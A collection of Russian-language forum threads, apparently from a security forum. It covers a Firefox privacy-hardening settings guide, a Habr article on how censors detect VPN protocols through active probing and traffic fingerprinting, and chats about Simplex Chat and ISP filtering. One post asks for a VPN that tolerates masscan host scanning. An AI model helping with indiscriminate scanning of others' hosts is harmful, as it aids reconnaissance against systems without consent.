IPv6 на текущем этапе в целом внедрен слабо, но он может создавать серезные проблемы анонимности. Все дело в том, что в IPv6 такое большое пространство адресов, что использовать NAT который красиво маскирует IP адрес вашего устройства, подменяя его публичным адресом провайдера нет необходимости. Более того, у IPv6 другая структура сетевого пакета, и привычные нам VPN- решения требуют донастройки для того, чтобы они еще и IPv6 трафик туннелировали. В итоге это может привести к утечке вашего реального IPv6 адреса, который четко укажет на ваше устройство. Так что если к угрозе "я тебя по IP вычислю" добавить "v6", звучит куда более реалистично. Во избежание таких проблем лучше в целом запретить браузеру работать с IPv6.

Click to expand...

network.gio.supported-protocols = ""

Настройка актуальная для пользователей Linux, GIO = GNOME Input/Output и управляет разными протоколами, которые, будучи перечисленными в настройке, разрешены к использованию браузером (помимо его базового функционала).

Click to expand...

network.file.disable_unc_paths = true

Эта настройка, будучи отключенной (false), позволяет использовать пути UNC (Universal Naming Convention) вида \\servername\sharename\path\to\file для доступа к файлам по сети. Проблема в том, что UNC частенько используется как вектор загрузки вредоносного ПО, поэтому если вы не уверены, что оно вам надо - лучше вырубить.

Click to expand...

permissions.manager.defaultsUrl = ""

В этой настройке содержится путь к файлу с разрешениями на предоставление сайту тех или иных функций (доступ к геопозиции, к камере, микрофону и т.п.). В этом файле браузер хранит значения по умолчанию, а также те что вы проставили, если дали сайту доступ к чему-то. Но т.к. мы настраиваем браузер на максимальную защиту от слежки и деанонимизации, мы изначально не планируем никому никаких разрешений давать.

Click to expand...

network.IDN_show_punycode = true

Эта настройка, будучи включенной, будет отображать не-латинские домены в формате punycode. Это могут быть домены в зоне .рф или любые другие, где используются non-latin символы. Если мы включаем ее, сайт résumé.com будет отображен как xn--rsum-bpad.com. Зачем? Чтобы снизить риски фишинга и обфускации, с этими хитрыми юникод-символами, наподобие é вообще связано много проблем в безопасности.

Click to expand...

Результат: 7 из 10, но отмечу что самые пакостные компоненты слежки выключены по умолчанию

Настройки поиска

Из-за того, что адресная строка браузера интегрирована с поиском, браузер по умолчанию всячески пытается предсказать, что же мы от него хотим, когда начинаем что-то туда вводить. Вводимые нами символы отправляются в сеть еще до того как мы нажмем Enter, чтобы показать нам всякие поисковые подсказки, что создает угрозу анонимности и приватности.

browser.search.suggest.enabled = false

Отключаем поисковые подсказки в поиске

Click to expand...

browser.urlbar.suggest.searches = false

Отключаем поисковые подсказки в строке адреса

Click to expand...

browser.fixup.alternate.enabled = false

Отключаем попытки угадать и автоматически закончить за нас ввод домена который мы вводим

Click to expand...

browser.urlbar.trimURLs = false

Отключаем "обрезку" URL, заставляя браузер показать весь путь полностью

Click to expand...

browser.urlbar.speculativeConnect.enabled = false

Отключаем предзагрузку введенного адреса. Если параметр включен, то еще до того как мы нажмем enter браузер начнет подгружать сайт в кэш

Click to expand...

Далее отключаем настройки автозаполнения всяких форм

browser.formfill.enable = false
extensions.formautofill.addresses.enabled = false
extensions.formautofill.available = "off"
extensions.formautofill.creditCards.available = false
extensions.formautofill.creditCards.enabled = false
extensions.formautofill.heuristics.enabled = false

Четыре настройки ниже отключают контекстуальные подсказки в строке адреса. Очередная попытка проанализировав ввод или контекст (содержание документа) предугадать, чего мы могли бы хотеть ввести в адресную строку.

browser.urlbar.quicksuggest.scenario = "history"
browser.urlbar.quicksuggest.enabled = false
browser.urlbar.suggest.quicksuggest.nonsponsored = false
browser.urlbar.suggest.quicksuggest.sponsored = false

Результат: 8 из 15

Пароли

signon.rememberSignons = false

Запрещаем сохранять вводимые пароли

Click to expand...

signon.autofillForms = false

Запрещаем автозаполнение логинов и паролей

Click to expand...

signon.formlessCapture.enabled = false

Запрещаем перехват браузером паролей вне форм

Click to expand...

network.auth.subresource-http-auth-allow = 1

Выставив этот параметр в положение 1, мы запрещаем открывать диалоги входа с cross-origin документов. Проще говоря, если мы зашли на foo.com браузер не разрешит в рамках этого сайта загрузить форму входа с сайта bar.com

Click to expand...

Результат: 3 из 4

Кэш и память

browser.cache.disk.enable = false

Запрещаем браузеру хранить что-то в кэше

Click to expand...

browser.sessionstore.privacy_level = 2

Запрещаем хранить данные любых сессий

Click to expand...

browser.sessionstore.resume_from_crash = false

Запрещаем восстанавливать сессии, прерванные аварийным выходом из браузера (crash)

Click to expand...

browser.pagethumbnails.capturing_disabled = true

Запрещаем создавать мини-скриншоты (thumbnails) посещаемых страниц

Click to expand...

browser.shell.shortcutFavicons = false

Запрещаем хранить в папке профиля фавиконки посещенных страниц

Click to expand...

browser.helperApps.deleteTempFileOnExit = true

Удаляем временные файлы, открытые сторонними приложениями (если вы загружая файл выбрали "открыть" вместо "сохранить") после закрытия этих приложений

Click to expand...

Результат: 5 из 6

HTTPS / SSL/TLS / OSCP / CERTS - сертификаты безопасности

dom.security.https_only_mode = true

Запрещаем открывать ссылки без шифрования HTTPS

Click to expand...

dom.security.https_only_mode_send_http_background_request = false

Запрещаем отправлять HTTP-запросы для проверки поддерживает ли сервер HTTPS

Click to expand...

browser.xul.error_pages.expert_bad_cert = true

Выводим подробную информацию о плохих сертификатах (небезопасное соединение)

Click to expand...

security.tls.enable_0rtt_data = false

В TLS 1.3 ввели фичу для ускорения Интернета, которая позволяет отправить зашифрованные данные на сервер до того, как будет полноценно установлено зашифрованное соединение. Это сделано для того, чтобы уменьшить задержку от хэндшейка. Проблема в том, что в этом случае данные отправляются до того, как браузер убедится что сертификат сервера подлинный. Нам такого не надо.

Click to expand...

security.OCSP.require = true

Online Certificate Status Protocol (OCSP) позволяет проверить сертификат на действительность, не отозван ли он, например, из-за его компрометации злоумышленниками. Включая эту настройку мы говорим браузеру, что он обязан проводить такую проверку для всех URL и не позволять загружать документы с недействительными сертификатами

Click to expand...

security.pki.sha1_enforcement_level = 1

Запрещаем использовать сертификаты SHA-1

Click to expand...

security.cert_pinning.enforcement_level = 2

Запрещаем со стороны ОС загружать в браузер (инжектить) сертификаты для сайтов, применительно к которым используется SSL-pinning.

Click to expand...

security.remote_settings.crlite_filters.enabled = true

Включаем CRLite (Certificate Revocation List Lite), альтернативный механизм проверки сертификатов на валидность и действительность, в дополнение к OCSP

Click to expand...

security.pki.crlite_mode = 2

Позволяем браузеру блокировать запросы на основании проверки CRLite

Click to expand...

Результат: 3 из 9

Заголовки и реферреры

network.http.referer.XOriginPolicy = 2

Тут мы запрещаем браузеру добавлять к cross-origin запросам (когда мы с сайта foo.com переходим на bar.com) заголовок с указанием источника перехода. Эти заголовки используются для отслеживания поведения пользователей.

Click to expand...

network.http.referer.XOriginTrimmingPolicy = 2

В дополнение к предыдущему пункту, мы запрещаем в принципе отправлять в X-origin заголовках подробную информацию, оставляем только протокол, домен и порт. По умолчанию браузер занес бы туда полный URL.

Click to expand...

Результат: 1 из 2

Аудио и видео: WebRTC, WebGL, DRM

media.peerconnection.enabled = false

Запрещаем WebRTC - одноранговую передачу данных, которая может выдать наш реальный IP удаленному серверу или пользователю

Click to expand...

media.peerconnection.ice.proxy_only_if_behind_proxy = true

Запрещаем браузеру устанавливать p2p соединения WebRTC вне прокси, если мы используем прокси и разрешили WebRTC

Click to expand...

media.peerconnection.ice.default_address_only = true

Запрещаем браузеру для WebRTC соединений использовать все сетевые интерфейсы, кроме используемого по умолчанию. В противном случае браузер использует все доступные интерфейсы, что может привести к утечке IP-адреса даже если вы используете VPN.

Click to expand...

media.peerconnection.ice.no_host = true

Запрещаем браузеру использовать IP из диапазонов приватных сетей (например 192.168.x.x или 10.x.x.x) для WebRTC соединений.

Click to expand...

webgl.disabled = true

Запрещаем WebGL, javascript API которое используя мощности видеокарты вашего устройства рендерит 3D-графику на веб-страницах. WebGL используется для фингерпринтинга вашей системы, т.к. разные комбинации ОС, драйвера и чипа видеокарты дают разный хэш рендера одной и той же графики.

Click to expand...

media.autoplay.default = 5

Запрещаем любым сайтам автоматически воспроизводить любые медиафайлы (аудио и видео)

Click to expand...

Результат: 0 из 6

Загрузки

browser.download.useDownloadDir = false

Делаем так, чтобы браузер всегда спрашивал нас, куда сохранить файл

Click to expand...

browser.download.manager.addToRecentDocs = false

Запрещаем браузеру добавлять скачанные файлы в список "недавних загрузок" в ОС

Click to expand...

Результат: 2 из 2

Куки

browser.contentblocking.category = "strict"

Включаем функцию улучшенной защиты от трекеров

Click to expand...

privacy.partition.serviceWorkers = true

Включаем изоляцию процессов разных сайтов внутри браузера. Если опция включена, браузер будет кушать больше системных ресурсов, но зато он изолирует процессы выполнения кода разных страниц друг от друга, снижая риски cross-site атак.

Click to expand...

privacy.partition.always_partition_third_party_non_cookie_storage = true
privacy.partition.always_partition_third_party_non_cookie_storage.exempt_sessionstorage = true

Два параметра выше включают изолированное хранение данных разных сайтов. Это снижает риски отслеживания нас через доступ к кросс-сайтовым кукам для трекеров.

Click to expand...

Результат: 1 из 4

Интерфейс

dom.disable_open_during_load = true

Запрещаем открытие всплывающих окон до полной загрузки страницы

Click to expand...

dom.popup_allowed_events = click dblclick mousedown pointerdown

Задаем белый список событий, которые могут вызвать открытие всплывающего окна

Click to expand...

extensions.pocket.enabled = false

Отключаем pocket - интерфейс для облачной синхронизации закладок и другой найденной нами и сложенной в это хранилище инфы

Click to expand...

extensions.Screenshots.disabled = true

Отключаем встроенное дополнение для создания скриншотов веб-страниц

Click to expand...

pdfjs.enableScripting = false

Запрещаем выполнять JS-код, если он находится внутри PDF-файла, который открыт в браузере

Click to expand...

privacy.userContext.enabled = true

Включаем возможность создавать "контейнеры" внутри браузера. Контейнер - это изолированное от других вкладок пространство, которое позволяет, например, зайти в рамках одного окна браузера в несколько аккаунтов одного и того же ресурса.

Click to expand...

Результаты: 5 из 6

Дополнения

extensions.enabledScopes = 5

Включаем дополнения для всех профилей браузера

Click to expand...

extensions.webextensions.restrictedDomains = ""

Этот параметр позволяет задать список доменов, в контексте которых браузерные дополнения будут выключены. Если вы добавите сюда google.com то при посещении гугла браузерные дополнения будут отключены для этой вкладки.

Click to expand...

extensions.postDownloadThirdPartyPrompt = false

Отключаем дополнительный вопрос "А вы точно-преточно уверены что хотите установить это дополнение" при его установке.

Click to expand...

Результаты: 3 из 3

Параметры выключения

Настраиваем автоматическую очистку истории, кук, кэша и т.п.
network.cookie.lifetimePolicy = 2
privacy.sanitize.sanitizeOnShutdown = true
privacy.clearOnShutdown.cache = true
privacy.clearOnShutdown.cookies = true
privacy.clearOnShutdown.downloads = true
privacy.clearOnShutdown.formdata = true
privacy.clearOnShutdown.history = true
privacy.clearOnShutdown.offlineApps = true
privacy.clearOnShutdown.sessions = true
privacy.clearOnShutdown.sitesettings = false
privacy.sanitize.timeSpan = 0

Результат: 7 из 11

Фингерпринтинг

privacy.resistFingerprinting = true
privacy.window.maxInnerWidth = 1600
privacy.window.maxInnerHeight = 900

Два пункта выше задают лимит для всплывающих окон, которые могут быть открыты через javascript-функцию window.open(). Это сделано для того, чтобы сайт не мог открыть окно больше, чем ваш экран.

Click to expand...

privacy.resistFingerprinting.block_mozAddonManager = true

Настройка при включении блокирует посещаемым сайтом доступ к списку установленных в браузере дополнений

Click to expand...

browser.display.use_system_colors = false

Этот параметр, будучи отключенным, запрещает сайтам доступ к вашей цветовой схеме, которая используется в вашей ОС. Многие сайты подстраиваются под тему вашего рабочего интерфейса (темная или светлая). Но отдавая такой параметр удаленному серверу вы даете ему еще один кусочек пазла от вашего уникального отпечатка.

Click to expand...

Результат: 3 из 5

Сурс:

![mirror.xyz](/proxy.php?image=https%3A%2F%2Fimages.mirror- media.xyz%2Fpublication- images%2Fl-4F-wrxNugLNaVMl1p0w.png%3Fheight%3D672%26width%3D1344&hash=a60036fb2affc24fd6504970921124b0&return_error=1)

[ Настройки Mozilla Firefox для параноиков и тест Mullvad Browser

](https://mirror.xyz/zerodaily.eth/V7SSr1FQ9vO8RiQe6Lo5sCEWVf- IcTQW5on82FJEY5U)

Mozilla Firefox - настоящий долгожитель, этот браузер, разрабатываемый условно-независимой некоммерческой организацией (донатит им в основном Google) остается предпоследней надеждой на приватность. Во всяком случае, так нам говорят его разработчики. На самом же деле он нафарширован всякими...

![mirror.xyz](/proxy.php?image=https%3A%2F%2Fimages.mirror- media.xyz%2Fpublication- images%2FCyPB6QQB3okKUipkiYLLO.png%3Fheight%3D1088%26width%3D990&hash=a54afd660b57e72549a660a7bc721ff3&return_error=1) mirror.xyz

Посоветуйте VPN, который пропускает scan трафик

ID: 676533bbb4103b69df371904
Thread ID: 125071
Created: 2024-10-18T15:50:15+0000
Last Post: 2024-11-20T22:30:32+0000
Author: Expl0it_777
Replies: 10 Views: 1K

Всем салам, собственно вопрос как в заголовке. Если подробнее, раньше пользовался сервисом masscan.online для скана хостов, но поскольку он приказал долго жить, ищу аналогичный сервис, либо VPN провайдера, который не блокирует masscan. Полноценный сервер в данный момент не рассматриваю, ибо дорого и будет стоять без дела большую часть времени. Если заблокирован в РФ это не проблема для меня, можете советовать и такой VPN. Всем спасибо за ответы.

Интернет-цензура и обход блокировок: не время расслабляться

ID: 676533bbb4103b69df37190f
Thread ID: 80299
Created: 2023-01-19T18:46:56+0000
Last Post: 2024-11-07T21:51:33+0000
Author: Wolverine
Replies: 7 Views: 1K

Disclaimer: практически всё, описанное в статье, не является чем-то принципиально новым или инновационным - оно давно известно и придумано, используется в разных странах мира, реализовано в коде и описано в научных и технических публикациях, поэтому никакого ящика Пандоры я не открываю.

Нередко на Хабре в темах, посвященных блокировкам ресурсов, встречаются забавные заявления вида "Я настроил TLS-VPN, теперь будут смотреть что хочу и цензоры мой VPN не заблокируют", "Я использую SSH-туннель, значит все ок, не забанят же они весь SSH целиком", и подобное. Что ж, давайте проанализируем опыт других стран и подумаем, как же оно может быть на самом деле.

0

Итак, допустим мы купили у какого-то сервиса, или, как подкованные пользователи, установили в личном облаке/VPS и настроили VPN-сервер для себя. Допустим, это популярные WireGuard или OpenVPN. Знаете что? WireGuard - это такой прекрасный протокол, который всеми своими пакетами просто кричит "Смотрите все, смотрите, я - VPN". И это, в принципе, не удивительно, потому что авторы на сайте проекта прямым текстом пишут, что обфускация не входила и не будет входить в их цели и планы.

Соответственно, на оборудовании DPI (оно же ТСПУ) при небольшом желании протокол WireGuard выявляется и блокируется на раз-два. IPSec/L2TP - аналогично. С OpenVPN то же самое - это, наверное, вообще самый первый протокол, который китайцы научились выявлять и банить на своем "великом китайском фаерволе" (GFW). We are fucked.

1

Окей, допустим мы сделали выводы, и вместо совсем уж палевных протоколов решили использовать TLS-VPN, такие как SSTP, AnyConnect/OpenConnect или SoftEther - трафик в них ходит внутри TLS, начальная установка соединения производится по HTTP - что должно быть совсем никак неотличимо от обычного подключения к любому обычному сайту. Ну, как сказать...

В случае с MS SSTP цензоры, желая выяснить, а чем же вы таким занимаетесь, просто сделают запрос на ваш сервер с URL /sra{BA195980-CD49-458b-9E23-C84EE0ADCD75}/_ c HTTP-методом SSTP_DUPLEX_POST , как это описано [в стандарте протокола](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms- sstp/7e5b2134-b4bf-435a-85bf-bfe0313fd889), и сервер радостно подтвердит в ответ, что он - да, действительно MS SSTP VPN.

SoftetherVPN в ответ на GET-запрос с путем /vpnsvc/connect.cgi, типом application/octet-stream и пэйлоадом 'VPNCONNECT ' выдаст в ответ 200 код и предсказуемый бинарный блоб с рассказом о том, кто он такой.

AnyConnect/OpenConnect при обращении по / или по /auth ответят очень характерной XML'кой. И от всего этого вы не избавитесь никак - это определено в протоколах, и именно через эту логику работают VPN-клиенты. We are fucked.

2

Ясно, мы будем умнее, и поскольку у нас все-таки TLS, давайте поставим перед VPN-сервером reverse-прокси (например, haproxy) и будем разруливать всё по SNI (server name identification): подключения с определенным доменом в запросе будем отправлять на VPN-сервер, а все остальные - на безобидный сайт с котиками. Можно даже попробовать спрятаться за какой-нибудь CDN - не забанят же они весь CDN, правда, и наш трафик из общего трафика ко всей CDN выцепить не смогут, да?

Правда, есть одно "но". В нынешних версиях TLS поле SNI не шифруется, соответственно цензоры легко его подсмотрят и сделают запрос именно с тем именем домена, что надо. На расширение Encrypted Client Hello (ECH), ранее известное как eSNI, можно не рассчитывать: во-первых, оно находится еще в состоянии Draft и неизвестно когда будет принято и повсеместно использоваться, а во-вторых, цензоры могут взять и просто-напросто заблокировать все соединения TLSv1.3 с ECH, как это сделали в Китае. Проблемы индейцев шерифа не волнуют. We are fucked.

3

Шутки в стороны, мы настроены решительно. Например, мы пропатчили OpenConnect- сервер, чтобы он принимал подключения только со специальным словом в URL'е (благо, AnyConnect/OpenConnect-клиенты такое позволяют), а всем остальным отдавал правдоподобную заглушку. Или настроили обязательную аутентификацию по клиентским сертификатам.

Или же мы подключаем тяжелую артиллерию от товарищей-китайцев, которые на обходе блокировок собаку съели - V2Ray/[XRay](https://github.com/XTLS/Xray- core) с плагином VMess и VLess поверх Websockets или gRPC, либо Trojan- GFW. Они работают поверх TLS, могут делить один и тот же порт с HTTPS-вебсервером, и не зная заветной секретной строчки, которую подслушать снаружи не получится, выявить наличие туннеля и подключиться к нему, казалось бы нельзя, значит все хорошо?

Давайте подумаем. Каждый TLS-клиент при подключении передает серверу определенный набор параметров: поддерживаемые версии TLS, поддерживаемые наборы шифров, поддерживаемые расширения, эллиптические кривые и их форматы. У каждой библиотеки этот набор свой, и его варианты можно анализировать. Это называется ClientHello fingerprinting. Отпечаток (fingerprint) библиотеки OpenSSL отличается от отпечатка библиотеки GnuTLS. Отпечаток TLS-библиотеки языка Go отличается от fingerprint'а браузера Firefox.

И когда с вашего адреса будут зафиксированы частые и долгие подключения к некому сайту клиентом с библиотекой GnuTLS (которая не используется ни в одном популярном браузере, но используется в VPN-клиенте OpenConnect), или с мобильного телефона через мобильного оператора подключается какой-то клиент на Go (на котором написан V2Ray), we are fucked. Такое детектирование, например, производится в Китае и [в Туркменистане](https://gitlab.torproject.org/tpo/anti-censorship/censorship- analysis/-/issues/40029).

4

Ладно. Допустим, мы пересобрали наш V2Ray-клиент не со стандартной TLS-либой, а с uTLS, которая может маскироваться под популярные браузеры. Или вообще взяли исходники самого популярного браузера, выдрали оттуда весь код сетевого стека и написали свой прокси-клиент на его базе, чтобы быть совсем уже неотличимыми от обычного браузерного TLS. Или решили пойти в сторону маскировки под другие протоколы типа SSH, или взяли OpenVPN с XOR- патчем. Или какой-нибудь KCP/Hysteria с маскировкой под DTLS.

Короче говоря, допустим у нас что-то более редкое и незаметное. Казалось бы, все хорошо? Ну как сказать. Помните "пакет Яровой"? Тот самый, который требует, чтобы интернет-сервисы сохраняли все метаданные сессий, а интернет- провайдеры так вообще записывали дампы трафика своих абонентов? Многие, еще тогда смеялись - мол, ну тупые, что им дадут гигабайты зашифрованных данных, которые они все равно не расшифруют? А вот что.

Пользуетесь вы, допустим, своим туннельчиком, смотрите всякие там запрещенные сайты. А потом - клик! - и случайно заходите через свой туннель на какой- нибудь отечественный сайт или сервис, замеченный в сотрудничестве с государством - условные там VK/Mail.ru/Яндекс или еще что-нибудь. Или на каком-нибудь безобидном сайте попадается виджет, баннер или счетчик от них же. Или кто-нибудь в комментарии вбросит ссылку на какой-нибудь сайт-honeypot, косящий под новостной ресурс, и вы на нее нажмете.

И вот тут произойдет самое интересное. Что внутри TLS, что внутри SSH, что внутри OpenVPN+xor, данные передаются в зашифрованном виде, и их не расшифровать. Но вот "внешняя форма" (размеры пакетов и тайминги между ними) у зашифрованных данных точно такая же, как и у нешифрованных. Цензоры видят, что от абонента к какому-то неизвестному серверу и обратно ходит трафик, а поток со стороны какого-нибудь подконтрольного сервиса видит, что с того же IP- адреса, что у "неизвестного сервера", туда прилетают какие-то запросы и улетают ответы, и - вот интересно - размеры пакетов и временные моменты практически полностью совпадают. Что весьма характерно говорит о том, что у нас тут прокси, возможно VPN, Андрюха, по коням!

И да, если вы поступите мудрее и у вашего сервера будет два IP-адреса, один на вход, а другой на выход, то сопоставить ваш "вход" и "выход" по адресам не получится, но по "форме" переданных данных, хоть и ощутимо сложнее, но при желании по прежнему можно. We are fucked again.

5

Не так уж плохо дело. Мы настроили для своего туннеля rule-based access. А именно, будем ходить по нему только туда, куда надо, и тогда, когда надо - а во всех остальных случаях пусть пакетики бегают сразу по обычному интернет- подключению. Правда, добавлять каждый раз новый ресурс в список - тот еще геморрой, особенно когда вы держите прокси/VPN не только для себя, но и, например, для далеко живущих немолодых родителей, которые, например, хотят читать всяких там иноагентов - но это, на самом деле, мелочи, мы справимся.

Допустим, мы по-прежнему используем SSH-туннель. Правда, проработает он, скорее всего, недолго. Почему? Потому что дело во всех тех же паттернах трафика. И нет, записывать и мучительно сравнивать ничего никуда уже не надо. Паттерны трафика у ssh-as-console, ssh-as-ftp и ssh-as-proxy очень разные и элементарно выявляются довольно просто должным образом натренированной нейросетью. Поэтому китайцы и иранцы уже давно всё подобное "неправильное" использование SSH выявляют и режут скорость подключения до черепашьей, что в терминале работать вы еще сможете, а вот серфить - практически нет.

Ну или, допустим, вы все-таки используете whatever-over-TLS-туннель с учетом всего приведенного в этой статье. Но проблема в том, что все сказанное в предыдущем абзаце, применимо и к нему - а именно, TLS-inside-TLS [выявляется сторонним наблюдателем](https://github-com.translate.goog/XTLS/Xray- core/discussions/1295?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp) с помощью эвристик и машинного обучения, которое еще можно дополнительно натренировать на наиболее популярных сайтах. We are still fucked.

6

Ладно. Мы добавили в наш тайный туннель random padding - "дописывание" в конец пакета какого-нибудь мусора случайно длины, чтобы сбить с толку наблюдателей. Или специально бьём пакеты на маленькие кусочки (и получаем проблемы с MTU, ой, придется потом старательно пересобирать). Или, наоборот, когда у нас внутри туннеля устанавливается TLS-соединение с каким-нибудь сервером, мы начинаем слать эти пакеты as-is без дополнительного слоя шифрования, таким образом выглядя со стороны на сто процентов как обычный TLS без двойного дна (правда, придется еще потратить несколько итераций на доведение протокола до ума и [затыкание очень тонких и очень неочевидных уязвимостей реализации](https://github-com.translate.goog/XTLS/Xray- core/discussions/1295?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp)). Казалось бы, happy end, we are not fucked anymore?

А тут начинается все самое интересное. А именно, рано или поздно в вопросах выявления туннелей и блокировок, особенно с развитием технологий их обхода (в конце концов, мы ещё не затронули стеганографию и много других интересных вещей), начинает расти то, что называется collateral damage - ущерб, возникший случайно в ходе атаки намеренной цели. Например, как говорят инсайдеры и подтверждают сводки с полей, то самое упомянутое выше выявление tls-inside-tls даже с random padding 'ом китайцы научились выявлять примерно с точностью 40%. Понятно дело, что при такой точности возможны также ложные срабатывания, но когда проблемы индейцев волновали шерифа?

Протоколы, которые снаружи не похожи ни на что (например, shadowsocks, obfs4, и т.д.) тоже при большом желании можно выявить по... статистике нулей и единичек в байтах, потому что у зашифрованного трафика это соотношение очень близко к 1:1 - хотя, понятное дело, при этом могут пострадать невиновные. Можно банить адреса, когда висят слишком много или слишком долго подключения к не-являющимися-очень- популярными-сайтам. Подобных вариантов довольно много, и если вы думаете, что цензоров остановят ложноположительные срабатывания и ущерб от блокировок добропорядочных сайтов - то вы заблуждаетесь.

Когда Роскомнадзор пытался заблокировать Telegram, они вносили в бан-лист целые подсети и хостинги, таким образом побанив кучу ни в чем невиновных сайтов и сервисов - и им за это ничего не было. В Иране, в связи с популярностью упомянутого выше похожего-на-браузер- прокси-клиента, цензоры вообще тупо запретили подключения с Chrome TLS fingerprint к популярным облачным сервисам. В Китае массово попадают под раздачу CDN, услугами которых пользуются безобидные и невиновные сайты и сервисы. В Туркменистане так вообще заблокирована почти треть (!) всех существующих в мире IP-адресов и подсетей, потому что стоит цензорам только выявить хотя бы один VPN или прокси, как в бан отправляется целый диапазон адресов около него или даже вся AS.

Вы, наверное, можете спросить, а что же делать юрлицам, которые тоже пользуются VPN для работы, или чьи сервисы могут случайно попасть под раздачу? Этот вопрос легко решается белыми списками: если юрлицу нужен VPN-сервер, или нужно обезопасить от случайной блокировки какие-либо свои сервисы, то стоит обязать их заранее сообщать о нужных адресах и протоколах в соответствующие ведомства, чтобы те добавили их в какой надо список - именно такие запросы Роскомнадзор через ЦБ [рассылал в банки](https://vc.ru/services/453771-cb- poprosil-banki-soobshchit-ob-ispolzovanii-vpn-servisov-windscribe-proton-i- drugih-frank-media), задумывая что-то нехорошее, и механизм таких списков уже существует.

Ну и, естественно, вполне вытекающим продолжением из этого будет "все что не разрешено - то запрещено". [Закон о запрете VPN и анонимайзеров в целях обхода блокировок](https://www.vedomosti.ru/technology/news/2017/11/01/740155-vpn- anonimaizeri) в РФ уже есть. Запрет использования несертифицированных средств шифрования - тоже. Подкрутить и расширить их зоны применения и многократно ужесточить наказания за такие "нарушения" - дело несложное. В Китае вежливые ребята пришли в гости к разработчикам небезизвестных ShadowSocks и GoAgent и [сделали им предложения, от которых те никак не смогли отказаться](https://www.eff.org/deeplinks/2015/08/speech-enables-speech-china- takes-aim-its-coders). В Иране [есть случаи возбуждения дел](https://www.scmp.com/abacus/tech/article/3095201/man-punished-using-vpn- scale-chinas-great-firewall-and-watch-porn) в связи с использованием VPN для доступа к запрещенным сайтам. Механизм стукачества в органы на неблагонадежных соседей был отлично отработан еще в прошлом веке в СССР. У государств есть монополия на насилие, не забывайте. We are fucked again?

4294967295

К чему это всё?

Как я уже сказал, большая часть того, что описано в статье, не является выдумками или голой теорией - оно давно известно, используется в некоторых странах мира, реализовано в коде и даже описано в научных публикациях.

Обход блокировок - это постоянная борьба щита и меча, и одновременно игра в кошки-мышки :~~иногда ты ешь медведя, иногда медведь ест тебя~~ иногда ты догоняющий, иногда догоняемый.

Если у вас сейчас есть прокси или VPN, и он работает - не расслабляйтесь: вы всего-лишь на полшага впереди недоброжелателей. Можно, конечно, спокойно сидеть и думать "Да они там все дураки и криворукие обезьяны и ниасилят ничего сложного и реально работающего", но, как говорится, надейся на лучшее, а готовься к худшему. Всегда есть смысл изучить опыт тех же китайских коллег и присмотреться к более сложновыявляемым и более цензуроустойчивым разработкам. На чем больше шагов вы будете впереди цензоров, тем больше времени у вас будет в запасе чтобы адаптироваться к изменившейся ситуации. Если вы разработчик и разбираетесь в сетевых протоколах и технологиях - можно присоединиться к одному из существующих проектов, помочь с разработкой и подумать над новыми идеями. Люди всего мира скажут вам спасибо.

Интересными и полезными в этом плане будут Net4People, No Thought is a Crime, дискуссии в проекте XTLS (там большая часть на китайском, но автопереводчик на английский справляется неплохо), GFW report. Если кто-то знает ещё хорошие ресурсы и сообщества по этой теме - напишите в комментарии

Ну и не стоит забывать, что рано или поздно, не имея возможности противостоять подобному свободолюбию технически, государство может начать противостоять административно (та самая монополия на насилие), причем так, что с вашей стороны, в свою очередь, технически противостоять может уже не получиться. Но это уже совсем другая история, требующая отдельной статьи, и, скорее всего, на другом ресурсе.

Когда я писал эту публикацию, я хотел вставить в нее картинки из какого-нибудь мрачного киберпанк-фильма, где в результате развития технологиий слежения и цензуры и невозможности противостоять этому, люди целиком и полностью стали подконтрольны государствам и потеряли все права на свободу мысли и приватность личной жизни. Но я надеюсь, до этого не дойдет. Все в наших руках.

Источник: Хабр

Simplex Chat, обсуждение

ID: 676533bbb4103b69df37191b
Thread ID: 124622
Created: 2024-10-12T03:29:30+0000
Last Post: 2024-10-15T00:38:28+0000
Author: Dwight149
Replies: 8 Views: 1K

Привет, я видел интересный проект под названием Simplex Chat и хотел узнать, что вы думаете о его безопасности? Насколько он безопасен?

Провайдеры и логи, обсуждение

ID: 676533bbb4103b69df371934
Thread ID: 121320
Created: 2024-08-23T19:58:34+0000
Last Post: 2024-09-09T20:10:16+0000
Author: Veil
Replies: 18 Views: 1K

Dread Pirate Roberts said:

а вот это уже не шутки, возможно, блок идёт для конкретных пользователей а может быть и кривая настройка зеркалирования трафика, которая дропает подключение вместо зеркалирования.

ping Veil

Click to expand...

Не думаю. Покрайней мере такой инфы не поступало. Как сейчас работает СКАТ, вышел СКАТ 14, который я даже знаю, я затрудняюсь ответить, пока меня кинули в самую жопу , на самый далекий участок. Как узнаю, так сразу отпишусь.Но могу вам сказать тревожные мысли. DPI стоит везде, а вот ТСПУ еще не у всех. Но сейчас идет активная установка ТСПУ везде. Почему такая озабоченность вы спросите меня? Тогда ответьте на простой вопрос. Почему я беря траффик у Ростелекома, должен еще ставить ТСПУ?
К чему я это? Скоро ТСПУ заблокирует ютуб и в сотовой. Почему там пока еще работает? Просто архитектура сетей немного другая. ТСПУ стоит не у каждого провайдера. Скоро и это изменят! Но я думаю, все равно обойдем. Сейчас ТСПУ уже работает за пределами своих возможностей. К примеру на трафике в гиг, через него проходит аж четыре. Что конечно отображается на фильтрации. Вот как то так.

coree said:

провайдера SkyNet

Click to expand...

О скайнете, офис у них в бывшем Доме Пионеров. Вчера как раз с ним копался. У них вчера трафик упал раза в три. С чем это связано было , они так и не сказали. Но скорость была в жопе, хотя пинг был 25. Сам охуел.

coree said:

запустил tracert на сервере под скайнетом. Пакет доходит до FILTER-TSPU- ID-**** и все. Это не признак блокировки?

Click to expand...

Не всегда дружище. У Ростелекома такое постоянно, защита от эха. Могут блокировать ICMP. Хотя хрен его знает?

coree said:

Могут ли клиенты избирательно подвергаться такой блокировки?

Click to expand...

Хрен его знает. Блокировкой ведает РКН. Провайдер даже не знает что там и как? . Для провайдера сейчас жопа с этой блокировкой ютуба. Все матерят РКН.

grozdniyandy said:

Я тоже, но очевидно что за некоторыми из нас следят и случайно могут на тебя попасть в поисках другого человека. Меня тут с арабом и/или работником некоторых мест путали, удивительно то что так и писали "Ты он?" "Ты от туда?"

Как минимум я пользуюсь впн

Click to expand...

